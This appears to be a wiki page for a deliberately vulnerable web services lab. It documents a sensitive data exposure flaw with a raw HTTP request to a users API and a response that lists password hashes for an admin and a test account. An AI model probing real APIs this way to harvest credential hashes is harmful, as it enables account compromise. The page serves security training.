Skip to content

Sensitive Data Exposure

Jump to bottom
Sam Sanoop edited this page Oct 31, 2021 · 1 revision

Introduction

APIs can often leak sensitive data through unexpected API calls.

Details

Any users can make a request to the users API

GET /api/v2/users HTTP/1.1
Host: dvws.local
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsInBlcm1pc3Npb25zIjpbInVzZXI6cmVhZCIsInVzZXI6d3JpdGUiXSwiaWF0IjoxNjM1NzE5NDU4LCJleHAiOjE2MzU4OTIyNTgsImlzcyI6Imh0dHBzOi8vZ2l0aHViLmNvbS9zbm9vcHlzZWN1cml0eSJ9.SSlXSXbYMMjRaS_nZ0jPmfL2VPAjmmIZrhC_uvcSnyA
Connection: close
Referer: http://dvws.local/notes.html
Content-Length: 1

which will reveal password hashes for all users

HTTP/1.1 200 OK
X-Powered-By: Express
Vary: Origin
Access-Control-Allow-Credentials: true
Cache-Control: no-store, no-cache, must-revalidate, private
Content-Type: application/json; charset=utf-8
Content-Length: 336
ETag: W/"150-Xw8+sEjh1vjh0KogCeUZCZSx51Q"
Date: Sun, 31 Oct 2021 22:36:46 GMT
Connection: close

{"status":200,"error":null,"result":[{"admin":true,"_id":"617f1824f47a696aa2253c3b","username":"admin","password":"$2b$10$IzyYy1Nu0E16SMjT7/erPuMvruixa5zx4UEkB.kRY3WbBfXakqBBm","__v":0},{"admin":false,"_id":"617f1824f47a696aa2253c3c","username":"test","password":"$2b$10$dvXrjBHMAp8XHtAMIxru8eagiPIavQrIS1jaoOtJgUEQbQJjyl80G","__v":0}]}

Solutions

FAQ

Questions

Clone this wiki locally